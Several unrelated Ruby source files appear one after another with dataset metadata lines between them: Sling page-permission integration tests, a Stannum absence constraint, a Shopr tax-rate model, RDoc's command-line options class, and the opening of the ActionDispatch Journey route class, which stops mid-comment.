#!/usr/bin/env ruby # Add all files in testscripts\SlingRuby\lib directory to ruby "require" search path require './ruby-lib-dir.rb' require 'sling/test' require 'sling/search' require 'sling/contacts' require 'test/unit.rb' include SlingSearch include SlingUsers include SlingContacts class TC_Kern939Test < Test::Unit::TestCase include SlingTest # This test depends on knowledge about the default user pages. def test_default_user_pages m = Time.now.to_f.to_s.gsub('.', '') @s.switch_user(User.admin_user()) user = create_user("testuser-#{m}") @s.switch_user(user) path = "#{user.home_path_for(@s)}/pages" res = @s.execute_get(@s.url_for("#{path}.2.json")) assert_equal("200", res.code, "Should have created pages in postprocessing") json = JSON.parse(res.body) assert_not_nil(json["index.html"], "Expected default page not found") end # This test depends on knowledge about the default group pages. def test_default_group_pages m = Time.now.to_f.to_s.gsub('.', '') @s.switch_user(User.admin_user()) group = create_group("g-testgroup-#{m}") path = "#{group.home_path_for(@s)}/pages" res = @s.execute_get(@s.url_for("#{path}.2.json")) assert_equal("200", res.code, "Should have created pages in postprocessing") json = JSON.parse(res.body) assert_not_nil(json["index.html"], "Expected default page not found") end def test_override_default_template m = Time.now.to_f.to_s.gsub('.', '') @s.switch_user(User.admin_user()) templatepath = "/test/template-#{m}" res = @s.execute_post(@s.url_for(templatepath), { ":operation" => "import", ":contentType" => "json", ":content" => "{nondefaultpage: {pageproperty: pagevalue}, nondefaultproperty: nondefaultvalue}" }) # Check some assumptions before proceeding to the real test. assert_equal("201", res.code, "Did not successfully create test template") res = @s.execute_get(@s.url_for("#{templatepath}.2.json")) assert_equal("200", res.code, "New page content is missing") props = JSON.parse(res.body) assert_equal("nondefaultvalue", props["nondefaultproperty"], "Top-level property is missing") assert_equal("pagevalue", props["nondefaultpage"]["pageproperty"], "Sub-page is missing") # And now for the real test... userid = "testuser-#{m}" password = "testuser" res = @s.execute_post(@s.url_for("#{$USER_URI}"), { ":name" => userid, "pwd" => password, "pwdConfirm" => password, ":sakai:pages-template" => templatepath, "_charset_" => "UTF-8" }) assert_equal("200", res.code, "Should have created user as admin") user = User.new(userid) @s.switch_user(user) res = @s.execute_get(@s.url_for("#{user.home_path_for(@s)}/pages.2.json")) assert_equal("200", res.code, "New page content is missing") props = JSON.parse(res.body) assert_equal("nondefaultvalue", props["nondefaultproperty"], "Top-level property is missing") assert_equal("pagevalue", props["nondefaultpage"]["pageproperty"], "Sub-page is missing") end def test_default_user_access m = Time.now.to_f.to_s.gsub('.', '') @s.switch_user(User.admin_user()) user = create_user("testuser-#{m}") @s.switch_user(user) path = "#{user.home_path_for(@s)}/pages" res = @s.execute_get(@s.url_for("#{path}.json")) assert_equal("200", res.code, "The user should be able to reach the user's pages") res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval") assert_equal("201", res.code, "Users should be able to add to their own pages") res = @s.execute_get(@s.url_for("#{path}/newnode.json")) assert_equal("200", res.code, "New page content is missing") props = JSON.parse(res.body) assert_equal("newval", props["newprop"], "New page content is incorrect") @s.switch_user(SlingUsers::User.anonymous) res = @s.execute_get(@s.url_for("#{path}.json")) assert_equal("200", res.code, "By default, the user's pages are public") end def test_default_group_access m = Time.now.to_f.to_s.gsub('.', '') @s.switch_user(User.admin_user()) manager = create_user("manager-#{m}") member = create_user("member-#{m}") otheruser = create_user("otheruser-#{m}") group = Group.new("g-test-#{m}") res = @s.execute_post(@s.url_for("#{$GROUP_URI}"), { ":name" => group.name, ":sakai:manager" => manager.name, ":member" => member.name, "_charset_" => "UTF-8" }) path = "#{group.home_path_for(@s)}/pages" @s.switch_user(member) res = @s.execute_get(@s.url_for("#{path}.json")) assert_equal("200", res.code, "Members should be able to read the group's pages") res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval") assert_not_equal("201", res.code, "Members should not be able to add to the group's pages") res = @s.execute_get(@s.url_for("#{path}/newnode.json")) assert_not_equal("200", res.code, "New page content should not have been created") @s.switch_user(manager) res = @s.execute_get(@s.url_for("#{path}.json")) assert_equal("200", res.code, "Managers should be able to read the group's pages") res = @s.execute_post(@s.url_for("#{path}/newnode"), "newprop" => "newval") assert_equal("201", res.code, "Managers should be able to add to the group's pages") res = @s.execute_get(@s.url_for("#{path}/newnode.json")) assert_equal("200", res.code, "New page content is missing") props = JSON.parse(res.body) assert_equal("newval", props["newprop"], "New page content is incorrect") @s.switch_user(SlingUsers::User.anonymous) res = @s.execute_get(@s.url_for("#{path}.json")) assert_equal("200", res.code, "By default, the group's pages are public") @s.switch_user(otheruser) res = @s.execute_post(@s.url_for("#{path}/newernode"), "newprop" => "newval") assert_not_equal("201", res.code, "Non-members should not be able to add to the group's pages") end end
42.300699
102
0.66044
38bb242ba046b32af4ccfaf5accfdb44c217b3a1
1,316
# frozen_string_literal: true require 'stannum/constraints/base' module Stannum::Constraints # An absence constraint asserts that the object is nil or empty. # # @example Using an Absence constraint # constraint = Stannum::Constraints::Absence.new # # constraint.matches?(nil) #=> true # constraint.matches?(Object.new) #=> false # # @example Using a Absence constraint with an Array # constraint.matches?([]) #=> true # constraint.matches?([1, 2, 3]) #=> false # # @example Using a Absence constraint with an Hash # constraint.matches?({}) #=> true # constraint.matches?({ key: 'value' }) #=> false class Absence < Stannum::Constraints::Base # The :type of the error generated for a matching object. NEGATED_TYPE = Stannum::Constraints::Presence::TYPE # The :type of the error generated for a non-matching object. TYPE = Stannum::Constraints::Presence::NEGATED_TYPE # Checks that the object is nil or empty. # # @return [true, false] true if the object is nil or empty, otherwise false. # # @see Stannum::Constraint#matches? def matches?(actual) return true if actual.nil? return true if actual.respond_to?(:empty?) && actual.empty? false end alias match? matches? end end
30.604651
80
0.658055
7acc839479fcf5a72f5bea3cc8c4b91716e01345
1,519
module Shopr class TaxRate < ApplicationRecord include Shopr::AssociatedCountries # The order address types which may be used when choosing how to apply the tax rate ADDRESS_TYPES = %w[billing delivery].freeze # Validations validates :name, presence: true validates :address_type, inclusion: { in: ADDRESS_TYPES } validates :rate, numericality: true # All products which are assigned to this tax rate has_many :products, dependent: :restrict_with_exception, class_name: 'Shopr::Product' # All delivery service prices which are assigned to this tax rate has_many :delivery_service_prices, dependent: :restrict_with_exception, class_name: 'Shopr::DeliveryServicePrice' # All tax rates ordered by their ID scope :ordered, -> { order(:id) } # Set the address type if appropriate before_validation { self.address_type = ADDRESS_TYPES.first if address_type.blank? } # A description of the tax rate including its name & percentage # # @return [String] def description "#{name} (#{rate}%)" end # The rate for a given order based on the rules on the tax rate # # @return [BigDecimal] def rate_for(order) return rate if countries.empty? return rate if address_type == 'billing' && (order.billing_country.nil? || country?(order.billing_country)) return rate if address_type == 'delivery' && (order.delivery_country.nil? || country?(order.delivery_country)) BigDecimal(0) end end end
34.522727
117
0.702436
792b473b7939e58a3ce3e35f446cc579fa6e9a3c
34,089
# frozen_string_literal: true require 'optparse' require 'pathname' ## # RDoc::Options handles the parsing and storage of options # # == Saved Options # # You can save some options like the markup format in the # <tt>.rdoc_options</tt> file in your gem. The easiest way to do this is: # # rdoc --markup tomdoc --write-options # # Which will automatically create the file and fill it with the options you # specified. # # The following options will not be saved since they interfere with the user's # preferences or with the normal operation of RDoc: # # * +--coverage-report+ # * +--dry-run+ # * +--encoding+ # * +--force-update+ # * +--format+ # * +--pipe+ # * +--quiet+ # * +--template+ # * +--verbose+ # # == Custom Options # # Generators can hook into RDoc::Options to add generator-specific command # line options. # # When <tt>--format</tt> is encountered in ARGV, RDoc calls ::setup_options on # the generator class to add extra options to the option parser. Options for # custom generators must occur after <tt>--format</tt>. <tt>rdoc --help</tt> # will list options for all installed generators. # # Example: # # class RDoc::Generator::Spellcheck # RDoc::RDoc.add_generator self # # def self.setup_options rdoc_options # op = rdoc_options.option_parser # # op.on('--spell-dictionary DICTIONARY', # RDoc::Options::Path) do |dictionary| # rdoc_options.spell_dictionary = dictionary # end # end # end # # Of course, RDoc::Options does not respond to +spell_dictionary+ by default # so you will need to add it: # # class RDoc::Options # # ## # # The spell dictionary used by the spell-checking plugin. # # attr_accessor :spell_dictionary # # end # # == Option Validators # # OptionParser validators will validate and cast user input values. In # addition to the validators that ship with OptionParser (String, Integer, # Float, TrueClass, FalseClass, Array, Regexp, Date, Time, URI, etc.), # RDoc::Options adds Path, PathArray and Template. class RDoc::Options ## # The deprecated options. DEPRECATED = { '--accessor' => 'support discontinued', '--diagram' => 'support discontinued', '--help-output' => 'support discontinued', '--image-format' => 'was an option for --diagram', '--inline-source' => 'source code is now always inlined', '--merge' => 'ri now always merges class information', '--one-file' => 'support discontinued', '--op-name' => 'support discontinued', '--opname' => 'support discontinued', '--promiscuous' => 'files always only document their content', '--ri-system' => 'Ruby installers use other techniques', } ## # RDoc options ignored (or handled specially) by --write-options SPECIAL = %w[ coverage_report dry_run encoding files force_output force_update generator generator_name generator_options generators op_dir option_parser pipe rdoc_include root static_path stylesheet_url template template_dir update_output_dir verbosity write_options ] ## # Option validator for OptionParser that matches a directory that exists on # the filesystem. Directory = Object.new ## # Option validator for OptionParser that matches a file or directory that # exists on the filesystem. Path = Object.new ## # Option validator for OptionParser that matches a comma-separated list of # files or directories that exist on the filesystem. PathArray = Object.new ## # Option validator for OptionParser that matches a template directory for an # installed generator that lives in # <tt>"rdoc/generator/template/#{template_name}"</tt> Template = Object.new ## # Character-set for HTML output. #encoding is preferred over #charset attr_accessor :charset ## # If true, RDoc will not write any files. attr_accessor :dry_run ## # The output encoding. All input files will be transcoded to this encoding. # # The default encoding is UTF-8. This is set via --encoding. attr_accessor :encoding ## # Files matching this pattern will be excluded attr_writer :exclude ## # The list of files to be processed attr_accessor :files ## # Create the output even if the output directory does not look # like an rdoc output directory attr_accessor :force_output ## # Scan newer sources than the flag file if true. attr_accessor :force_update ## # Formatter to mark up text with attr_accessor :formatter ## # Description of the output generator (set with the <tt>--format</tt> option) attr_accessor :generator ## # For #== attr_reader :generator_name # :nodoc: ## # Loaded generator options. Used to prevent --help from loading the same # options multiple times. attr_accessor :generator_options ## # Old rdoc behavior: hyperlink all words that match a method name, # even if not preceded by '#' or '::' attr_accessor :hyperlink_all ## # Include line numbers in the source code attr_accessor :line_numbers ## # The output locale. attr_accessor :locale ## # The directory where locale data live. attr_accessor :locale_dir ## # Name of the file, class or module to display in the initial index page (if # not specified the first file we encounter is used) attr_accessor :main_page ## # The default markup format. The default is 'rdoc'. 'markdown', 'tomdoc' # and 'rd' are also built-in. attr_accessor :markup ## # If true, only report on undocumented files attr_accessor :coverage_report ## # The name of the output directory attr_accessor :op_dir ## # The OptionParser for this instance attr_accessor :option_parser ## # Output heading decorations? attr_accessor :output_decoration ## # Directory where guides, FAQ, and other pages not associated with a class # live. You may leave this unset if these are at the root of your project. attr_accessor :page_dir ## # Is RDoc in pipe mode? attr_accessor :pipe ## # Array of directories to search for files to satisfy an :include: attr_accessor :rdoc_include ## # Root of the source documentation will be generated for. Set this when # building documentation outside the source directory. Defaults to the # current directory. attr_accessor :root ## # Include the '#' at the front of hyperlinked instance method names attr_accessor :show_hash ## # Directory to copy static files from attr_accessor :static_path ## # The number of columns in a tab attr_accessor :tab_width ## # Template to be used when generating output attr_accessor :template ## # Directory the template lives in attr_accessor :template_dir ## # Additional template stylesheets attr_accessor :template_stylesheets ## # Documentation title attr_accessor :title ## # Should RDoc update the timestamps in the output dir? attr_accessor :update_output_dir ## # Verbosity, zero means quiet attr_accessor :verbosity ## # URL of web cvs frontend attr_accessor :webcvs ## # Minimum visibility of a documented method. One of +:public+, +:protected+, # +:private+ or +:nodoc+. # # The +:nodoc+ visibility ignores all directives related to visibility. The # other visibilities may be overridden on a per-method basis with the :doc: # directive. attr_reader :visibility def initialize loaded_options = nil # :nodoc: init_ivars override loaded_options if loaded_options end def init_ivars # :nodoc: @dry_run = false @exclude = %w[ ~\z \.orig\z \.rej\z \.bak\z \.gemspec\z ] @files = nil @force_output = false @force_update = true @generator = nil @generator_name = nil @generator_options = [] @generators = RDoc::RDoc::GENERATORS @hyperlink_all = false @line_numbers = false @locale = nil @locale_name = nil @locale_dir = 'locale' @main_page = nil @markup = 'rdoc' @coverage_report = false @op_dir = nil @page_dir = nil @pipe = false @output_decoration = true @rdoc_include = [] @root = Pathname(Dir.pwd) @show_hash = false @static_path = [] @stylesheet_url = nil # TODO remove in RDoc 4 @tab_width = 8 @template = nil @template_dir = nil @template_stylesheets = [] @title = nil @update_output_dir = true @verbosity = 1 @visibility = :protected @webcvs = nil @write_options = false @encoding = Encoding::UTF_8 @charset = @encoding.name end def init_with map # :nodoc: init_ivars encoding = map['encoding'] @encoding = encoding ? Encoding.find(encoding) : encoding @charset = map['charset'] @exclude = map['exclude'] @generator_name = map['generator_name'] @hyperlink_all = map['hyperlink_all'] @line_numbers = map['line_numbers'] @locale_name = map['locale_name'] @locale_dir = map['locale_dir'] @main_page = map['main_page'] @markup = map['markup'] @op_dir = map['op_dir'] @show_hash = map['show_hash'] @tab_width = map['tab_width'] @template_dir = map['template_dir'] @title = map['title'] @visibility = map['visibility'] @webcvs = map['webcvs'] @rdoc_include = sanitize_path map['rdoc_include'] @static_path = sanitize_path map['static_path'] end def yaml_initialize tag, map # :nodoc: init_with map end def override map # :nodoc: if map.has_key?('encoding') encoding = map['encoding'] @encoding = encoding ? Encoding.find(encoding) : encoding end @charset = map['charset'] if map.has_key?('charset') @exclude = map['exclude'] if map.has_key?('exclude') @generator_name = map['generator_name'] if map.has_key?('generator_name') @hyperlink_all = map['hyperlink_all'] if map.has_key?('hyperlink_all') @line_numbers = map['line_numbers'] if map.has_key?('line_numbers') @locale_name = map['locale_name'] if map.has_key?('locale_name') @locale_dir = map['locale_dir'] if map.has_key?('locale_dir') @main_page = map['main_page'] if map.has_key?('main_page') @markup = map['markup'] if map.has_key?('markup') @op_dir = map['op_dir'] if map.has_key?('op_dir') @show_hash = map['show_hash'] if map.has_key?('show_hash') @tab_width = map['tab_width'] if map.has_key?('tab_width') @template_dir = map['template_dir'] if map.has_key?('template_dir') @title = map['title'] if map.has_key?('title') @visibility = map['visibility'] if map.has_key?('visibility') @webcvs = map['webcvs'] if map.has_key?('webcvs') if map.has_key?('rdoc_include') @rdoc_include = sanitize_path map['rdoc_include'] end if map.has_key?('static_path') @static_path = sanitize_path map['static_path'] end end def == other # :nodoc: self.class === other and @encoding == other.encoding and @generator_name == other.generator_name and @hyperlink_all == other.hyperlink_all and @line_numbers == other.line_numbers and @locale == other.locale and @locale_dir == other.locale_dir and @main_page == other.main_page and @markup == other.markup and @op_dir == other.op_dir and @rdoc_include == other.rdoc_include and @show_hash == other.show_hash and @static_path == other.static_path and @tab_width == other.tab_width and @template == other.template and @title == other.title and @visibility == other.visibility and @webcvs == other.webcvs end ## # Check that the files on the command line exist def check_files @files.delete_if do |file| if File.exist? file then if File.readable? file then false else warn "file '#{file}' not readable" true end else warn "file '#{file}' not found" true end end end ## # Ensure only one generator is loaded def check_generator if @generator then raise OptionParser::InvalidOption, "generator already set to #{@generator_name}" end end ## # Set the title, but only if not already set. Used to set the title # from a source file, so that a title set from the command line # will have the priority. def default_title=(string) @title ||= string end ## # For dumping YAML def encode_with coder # :nodoc: encoding = @encoding ? @encoding.name : nil coder.add 'encoding', encoding coder.add 'static_path', sanitize_path(@static_path) coder.add 'rdoc_include', sanitize_path(@rdoc_include) ivars = instance_variables.map { |ivar| ivar.to_s[1..-1] } ivars -= SPECIAL ivars.sort.each do |ivar| coder.add ivar, instance_variable_get("@#{ivar}") end end ## # Create a regexp for #exclude def exclude if @exclude.nil? or Regexp === @exclude then # done, #finish is being re-run @exclude elsif @exclude.empty? then nil else Regexp.new(@exclude.join("|")) end end ## # Completes any unfinished option setup business such as filtering for # existent files, creating a regexp for #exclude and setting a default # #template. def finish @op_dir ||= 'doc' @rdoc_include << "." if @rdoc_include.empty? root = @root.to_s @rdoc_include << root unless @rdoc_include.include?(root) @exclude = self.exclude finish_page_dir check_files # If no template was specified, use the default template for the output # formatter unless @template then @template = @generator_name @template_dir = template_dir_for @template end if @locale_name @locale = RDoc::I18n::Locale[@locale_name] @locale.load(@locale_dir) else @locale = nil end self end ## # Fixes the page_dir to be relative to the root_dir and adds the page_dir to # the files list. def finish_page_dir return unless @page_dir @files << @page_dir.to_s page_dir = nil begin page_dir = @page_dir.expand_path.relative_path_from @root rescue ArgumentError # On Windows, sometimes crosses different drive letters. page_dir = @page_dir.expand_path end @page_dir = page_dir end ## # Returns a properly-space list of generators and their descriptions. def generator_descriptions lengths = [] generators = RDoc::RDoc::GENERATORS.map do |name, generator| lengths << name.length description = generator::DESCRIPTION if generator.const_defined? :DESCRIPTION [name, description] end longest = lengths.max generators.sort.map do |name, description| if description then " %-*s - %s" % [longest, name, description] else " #{name}" end end.join "\n" end ## # Parses command line options. def parse argv ignore_invalid = true argv.insert(0, *ENV['RDOCOPT'].split) if ENV['RDOCOPT'] opts = OptionParser.new do |opt| @option_parser = opt opt.program_name = File.basename $0 opt.version = RDoc::VERSION opt.release = nil opt.summary_indent = ' ' * 4 opt.banner = <<-EOF Usage: #{opt.program_name} [options] [names...] Files are parsed, and the information they contain collected, before any output is produced. This allows cross references between all files to be resolved. If a name is a directory, it is traversed. If no names are specified, all Ruby files in the current directory (and subdirectories) are processed. How RDoc generates output depends on the output formatter being used, and on the options you give. Options can be specified via the RDOCOPT environment variable, which functions similar to the RUBYOPT environment variable for ruby. $ export RDOCOPT="--show-hash" will make rdoc show hashes in method links by default. Command-line options always will override those in RDOCOPT. Available formatters: #{generator_descriptions} RDoc understands the following file formats: EOF parsers = Hash.new { |h,parser| h[parser] = [] } RDoc::Parser.parsers.each do |regexp, parser| parsers[parser.name.sub('RDoc::Parser::', '')] << regexp.source end parsers.sort.each do |parser, regexp| opt.banner += " - #{parser}: #{regexp.join ', '}\n" end opt.banner += " - TomDoc: Only in ruby files\n" opt.banner += "\n The following options are deprecated:\n\n" name_length = DEPRECATED.keys.sort_by { |k| k.length }.last.length DEPRECATED.sort_by { |k,| k }.each do |name, reason| opt.banner += " %*1$2$s %3$s\n" % [-name_length, name, reason] end opt.accept Template do |template| template_dir = template_dir_for template unless template_dir then $stderr.puts "could not find template #{template}" nil else [template, template_dir] end end opt.accept Directory do |directory| directory = File.expand_path directory raise OptionParser::InvalidArgument unless File.directory? directory directory end opt.accept Path do |path| path = File.expand_path path raise OptionParser::InvalidArgument unless File.exist? path path end opt.accept PathArray do |paths,| paths = if paths then paths.split(',').map { |d| d unless d.empty? } end paths.map do |path| path = File.expand_path path raise OptionParser::InvalidArgument unless File.exist? path path end end opt.separator nil opt.separator "Parsing options:" opt.separator nil opt.on("--encoding=ENCODING", "-e", Encoding.list.map { |e| e.name }, "Specifies the output encoding. All files", "read will be converted to this encoding.", "The default encoding is UTF-8.", "--encoding is preferred over --charset") do |value| @encoding = Encoding.find value @charset = @encoding.name # may not be valid value end opt.separator nil opt.on("--locale=NAME", "Specifies the output locale.") do |value| @locale_name = value end opt.on("--locale-data-dir=DIR", "Specifies the directory where locale data live.") do |value| @locale_dir = value end opt.separator nil opt.on("--all", "-a", "Synonym for --visibility=private.") do |value| @visibility = :private end opt.separator nil opt.on("--exclude=PATTERN", "-x", Regexp, "Do not process files or directories", "matching PATTERN.") do |value| @exclude << value end opt.separator nil opt.on("--extension=NEW=OLD", "-E", "Treat files ending with .new as if they", "ended with .old. Using '-E cgi=rb' will", "cause xxx.cgi to be parsed as a Ruby file.") do |value| new, old = value.split(/=/, 2) unless new and old then raise OptionParser::InvalidArgument, "Invalid parameter to '-E'" end unless RDoc::Parser.alias_extension old, new then raise OptionParser::InvalidArgument, "Unknown extension .#{old} to -E" end end opt.separator nil opt.on("--[no-]force-update", "-U", "Forces rdoc to scan all sources even if", "no files are newer than the flag file.") do |value| @force_update = value end opt.separator nil opt.on("--pipe", "-p", "Convert RDoc on stdin to HTML") do @pipe = true end opt.separator nil opt.on("--tab-width=WIDTH", "-w", Integer, "Set the width of tab characters.") do |value| raise OptionParser::InvalidArgument, "#{value} is an invalid tab width" if value <= 0 @tab_width = value end opt.separator nil opt.on("--visibility=VISIBILITY", "-V", RDoc::VISIBILITIES + [:nodoc], "Minimum visibility to document a method.", "One of 'public', 'protected' (the default),", "'private' or 'nodoc' (show everything)") do |value| @visibility = value end opt.separator nil markup_formats = RDoc::Text::MARKUP_FORMAT.keys.sort opt.on("--markup=MARKUP", markup_formats, "The markup format for the named files.", "The default is rdoc. Valid values are:", markup_formats.join(', ')) do |value| @markup = value end opt.separator nil opt.on("--root=ROOT", Directory, "Root of the source tree documentation", "will be generated for. Set this when", "building documentation outside the", "source directory. Default is the", "current directory.") do |root| @root = Pathname(root) end opt.separator nil opt.on("--page-dir=DIR", Directory, "Directory where guides, your FAQ or", "other pages not associated with a class", "live. Set this when you don't store", "such files at your project root.", "NOTE: Do not use the same file name in", "the page dir and the root of your project") do |page_dir| @page_dir = Pathname(page_dir) end opt.separator nil opt.separator "Common generator options:" opt.separator nil opt.on("--force-output", "-O", "Forces rdoc to write the output files,", "even if the output directory exists", "and does not seem to have been created", "by rdoc.") do |value| @force_output = value end opt.separator nil generator_text = @generators.keys.map { |name| " #{name}" }.sort opt.on("-f", "--fmt=FORMAT", "--format=FORMAT", @generators.keys, "Set the output formatter. One of:", *generator_text) do |value| check_generator @generator_name = value.downcase setup_generator end opt.separator nil opt.on("--include=DIRECTORIES", "-i", PathArray, "Set (or add to) the list of directories to", "be searched when satisfying :include:", "requests. Can be used more than once.") do |value| @rdoc_include.concat value.map { |dir| dir.strip } end opt.separator nil opt.on("--[no-]coverage-report=[LEVEL]", "--[no-]dcov", "-C", Integer, "Prints a report on undocumented items.", "Does not generate files.") do |value| value = 0 if value.nil? # Integer converts -C to nil @coverage_report = value @force_update = true if value end opt.separator nil opt.on("--output=DIR", "--op", "-o", "Set the output directory.") do |value| @op_dir = value end opt.separator nil opt.on("-d", "Deprecated --diagram option.", "Prevents firing debug mode", "with legacy invocation.") do |value| end opt.separator nil opt.separator 'HTML generator options:' opt.separator nil opt.on("--charset=CHARSET", "-c", "Specifies the output HTML character-set.", "Use --encoding instead of --charset if", "available.") do |value| @charset = value end opt.separator nil opt.on("--hyperlink-all", "-A", "Generate hyperlinks for all words that", "correspond to known methods, even if they", "do not start with '#' or '::' (legacy", "behavior).") do |value| @hyperlink_all = value end opt.separator nil opt.on("--main=NAME", "-m", "NAME will be the initial page displayed.") do |value| @main_page = value end opt.separator nil opt.on("--[no-]line-numbers", "-N", "Include line numbers in the source code.", "By default, only the number of the first", "line is displayed, in a leading comment.") do |value| @line_numbers = value end opt.separator nil opt.on("--show-hash", "-H", "A name of the form #name in a comment is a", "possible hyperlink to an instance method", "name. When displayed, the '#' is removed", "unless this option is specified.") do |value| @show_hash = value end opt.separator nil opt.on("--template=NAME", "-T", Template, "Set the template used when generating", "output. The default depends on the", "formatter used.") do |(template, template_dir)| @template = template @template_dir = template_dir end opt.separator nil opt.on("--template-stylesheets=FILES", PathArray, "Set (or add to) the list of files to", "include with the html template.") do |value| @template_stylesheets.concat value end opt.separator nil opt.on("--title=TITLE", "-t", "Set TITLE as the title for HTML output.") do |value| @title = value end opt.separator nil opt.on("--copy-files=PATH", Path, "Specify a file or directory to copy static", "files from.", "If a file is given it will be copied into", "the output dir. If a directory is given the", "entire directory will be copied.", "You can use this multiple times") do |value| @static_path << value end opt.separator nil opt.on("--webcvs=URL", "-W", "Specify a URL for linking to a web frontend", "to CVS. If the URL contains a '\%s', the", "name of the current file will be", "substituted; if the URL doesn't contain a", "'\%s', the filename will be appended to it.") do |value| @webcvs = value end opt.separator nil opt.separator "ri generator options:" opt.separator nil opt.on("--ri", "-r", "Generate output for use by `ri`. The files", "are stored in the '.rdoc' directory under", "your home directory unless overridden by a", "subsequent --op parameter, so no special", "privileges are needed.") do |value| check_generator @generator_name = "ri" @op_dir ||= RDoc::RI::Paths::HOMEDIR setup_generator end opt.separator nil opt.on("--ri-site", "-R", "Generate output for use by `ri`. The files", "are stored in a site-wide directory,", "making them accessible to others, so", "special privileges are needed.") do |value| check_generator @generator_name = "ri" @op_dir = RDoc::RI::Paths.site_dir setup_generator end opt.separator nil opt.separator "Generic options:" opt.separator nil opt.on("--write-options", "Write .rdoc_options to the current", "directory with the given options. Not all", "options will be used. See RDoc::Options", "for details.") do |value| @write_options = true end opt.separator nil opt.on("--[no-]dry-run", "Don't write any files") do |value| @dry_run = value end opt.separator nil opt.on("-D", "--[no-]debug", "Displays lots on internal stuff.") do |value| $DEBUG_RDOC = value end opt.separator nil opt.on("--[no-]ignore-invalid", "Ignore invalid options and continue", "(default true).") do |value| ignore_invalid = value end opt.separator nil opt.on("--quiet", "-q", "Don't show progress as we parse.") do |value| @verbosity = 0 end opt.separator nil opt.on("--verbose", "-V", "Display extra progress as RDoc parses") do |value| @verbosity = 2 end opt.separator nil opt.on("--version", "-v", "print the version") do puts opt.version exit end opt.separator nil opt.on("--help", "-h", "Display this help") do RDoc::RDoc::GENERATORS.each_key do |generator| setup_generator generator end puts opt.help exit end opt.separator nil end setup_generator 'darkfish' if argv.grep(/\A(-f|--fmt|--format|-r|-R|--ri|--ri-site)\b/).empty? deprecated = [] invalid = [] begin opts.parse! argv rescue OptionParser::ParseError => e if DEPRECATED[e.args.first] then deprecated << e.args.first elsif %w[--format --ri -r --ri-site -R].include? e.args.first then raise else invalid << e.args.join(' ') end retry end unless @generator then @generator = RDoc::Generator::Darkfish @generator_name = 'darkfish' end if @pipe and not argv.empty? then @pipe = false invalid << '-p (with files)' end unless quiet then deprecated.each do |opt| $stderr.puts 'option ' + opt + ' is deprecated: ' + DEPRECATED[opt] end end unless invalid.empty? then invalid = "invalid options: #{invalid.join ', '}" if ignore_invalid then unless quiet then $stderr.puts invalid $stderr.puts '(invalid options are ignored)' end else unless quiet then $stderr.puts opts end $stderr.puts invalid exit 1 end end @files = argv.dup finish if @write_options then write_options exit end self end ## # Don't display progress as we process the files def quiet @verbosity.zero? end ## # Set quietness to +bool+ def quiet= bool @verbosity = bool ? 0 : 1 end ## # Removes directories from +path+ that are outside the current directory def sanitize_path path require 'pathname' dot = Pathname.new('.').expand_path path.reject do |item| path = Pathname.new(item).expand_path is_reject = nil relative = nil begin relative = path.relative_path_from(dot).to_s rescue ArgumentError # On Windows, sometimes crosses different drive letters. is_reject = true else is_reject = relative.start_with? '..' end is_reject end end ## # Set up an output generator for the named +generator_name+. # # If the found generator responds to :setup_options it will be called with # the options instance. This allows generators to add custom options or set # default options. def setup_generator generator_name = @generator_name @generator = @generators[generator_name] unless @generator then raise OptionParser::InvalidArgument, "Invalid output formatter #{generator_name}" end return if @generator_options.include? @generator @generator_name = generator_name @generator_options << @generator if @generator.respond_to? :setup_options then @option_parser ||= OptionParser.new @generator.setup_options self end end ## # Finds the template dir for +template+ def template_dir_for template template_path = File.join 'rdoc', 'generator', 'template', template $LOAD_PATH.map do |path| File.join File.expand_path(path), template_path end.find do |dir| File.directory? dir end end # Sets the minimum visibility of a documented method. # # Accepts +:public+, +:protected+, +:private+, +:nodoc+, or +:all+. # # When +:all+ is passed, visibility is set to +:private+, similarly to # RDOCOPT="--all", see #visibility for more information. def visibility= visibility case visibility when :all @visibility = :private else @visibility = visibility end end ## # Displays a warning using Kernel#warn if we're being verbose def warn message super message if @verbosity > 1 end ## # Writes the YAML file .rdoc_options to the current directory containing the # parsed options. def write_options RDoc.load_yaml File.open '.rdoc_options', 'w' do |io| io.set_encoding Encoding::UTF_8 YAML.dump self, io end end ## # Loads options from .rdoc_options if the file exists, otherwise creates a # new RDoc::Options instance. def self.load_options options_file = File.expand_path '.rdoc_options' return RDoc::Options.new unless File.exist? options_file RDoc.load_yaml begin options = YAML.safe_load File.read('.rdoc_options'), permitted_classes: [RDoc::Options, Symbol] rescue Psych::SyntaxError raise RDoc::Error, "#{options_file} is not a valid rdoc options file" end return RDoc::Options.new unless options # Allow empty file. raise RDoc::Error, "#{options_file} is not a valid rdoc options file" unless RDoc::Options === options or Hash === options if Hash === options # Override the default values with the contents of YAML file. options = RDoc::Options.new options end options end end
25.923194
101
0.60961
4aee7a6f83b201aa438abcd3e6109e6efe3a9992
5,105
# frozen_string_literal: true module ActionDispatch # :stopdoc: module Journey class Route attr_reader :app, :path, :defaults, :name, :precedence, :constraints, :internal, :scope_options alias :conditions :constraints module VerbMatchers VERBS = %w{ DELETE GET HEAD OPTIONS LINK PATCH POST PUT TRACE UNLINK } VERBS.each do |v| class_eval <<-eoc, __FILE__, __LINE__ + 1 class #{v} def self.verb; name.split("::").last; end def self.call(req); req.#{v.downcase}?; end end eoc end class Unknown attr_reader :verb def initialize(verb) @verb = verb end def call(request); @verb === request.request_method; end end class All def self.call(_); true; end def self.verb; ""; end end VERB_TO_CLASS = VERBS.each_with_object(all: All) do |verb, hash| klass = const_get verb hash[verb] = klass hash[verb.downcase] = klass hash[verb.downcase.to_sym] = klass end end def self.verb_matcher(verb) VerbMatchers::VERB_TO_CLASS.fetch(verb) do VerbMatchers::Unknown.new verb.to_s.dasherize.upcase end end ## # +path+ is a path constraint. # +constraints+ is a hash of constraints to be applied to this route. def initialize(name:, app: nil, path:, constraints: {}, required_defaults: [], defaults: {}, request_method_match: nil, precedence: 0, scope_options: {}, internal: false) @name = name @app = app @path = path @request_method_match = request_method_match @constraints = constraints @defaults = defaults @required_defaults = nil @_required_defaults = required_defaults @required_parts = nil @parts = nil @decorated_ast = nil @precedence = precedence @path_formatter = @path.build_formatter @scope_options = scope_options @internal = internal end def eager_load! path.eager_load! ast parts required_defaults nil end def ast @decorated_ast ||= begin decorated_ast = path.ast decorated_ast.find_all(&:terminal?).each { |n| n.memo = self } decorated_ast end end # Needed for `rails routes`. Picks up succinctly defined requirements # for a route, for example route # # get 'photo/:id', :controller => 'photos', :action => 'show', # :id => /[A-Z]\d{5}/ # # will have {:controller=>"photos", 